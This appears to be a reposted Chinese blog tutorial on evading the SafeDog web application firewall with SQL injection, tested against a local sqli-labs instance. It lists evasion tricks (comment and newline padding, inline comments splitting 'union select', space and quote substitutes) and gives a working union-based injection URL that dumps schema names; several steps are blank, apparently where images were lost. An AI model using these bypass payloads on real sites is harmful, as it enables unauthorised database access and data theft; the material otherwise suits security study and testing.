sql注入繞過安全狗實戰


  1. =繞過 like regexp(匹配)> < (測試安全狗 ><不可以繞過)
  2. 注釋+換行(%0a作為垃圾數據填充)  
  3.  

     聯合查詢繞過 探測出當union select 出現時會攔截,則采用/**/加換行填充逃過(繞過先寫正確的注釋,再在注釋中添加)

 

 

 

 

 

 

4.查詢時繞過(當有括號時不用空格,避免觸發特征)

http://192.168.231.110/sqli/less-1/?id=-1'union/*/%0a*a*/select/**/1,2,(select/**/group_concat(schema_name)from/**/information_schema.schemata)%23

 

 

 

5. 查詢數據庫,當發現添加database()后,會攔截,此時則想辦法繞過database()

方法1:%0a

 

方法2:/**/

 

 

 

方法3:內聯注釋打亂

 

 

 

繞過一些常識

空格繞過

%20 %09 %0a %0b %0c %0d %a0 %00 /**/  /*!*/ 浮點數1.0也可以繞過 括號繞過(可以計算出結果的才能使用括號)

引號繞過

十六進制

 

 

 

6.查詢字段繞過(不用繞過) ,也可以同表名一樣

 

 

 

 

 

 

7.查詢user表 不用繼續繞過直接寫即可

 

 

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM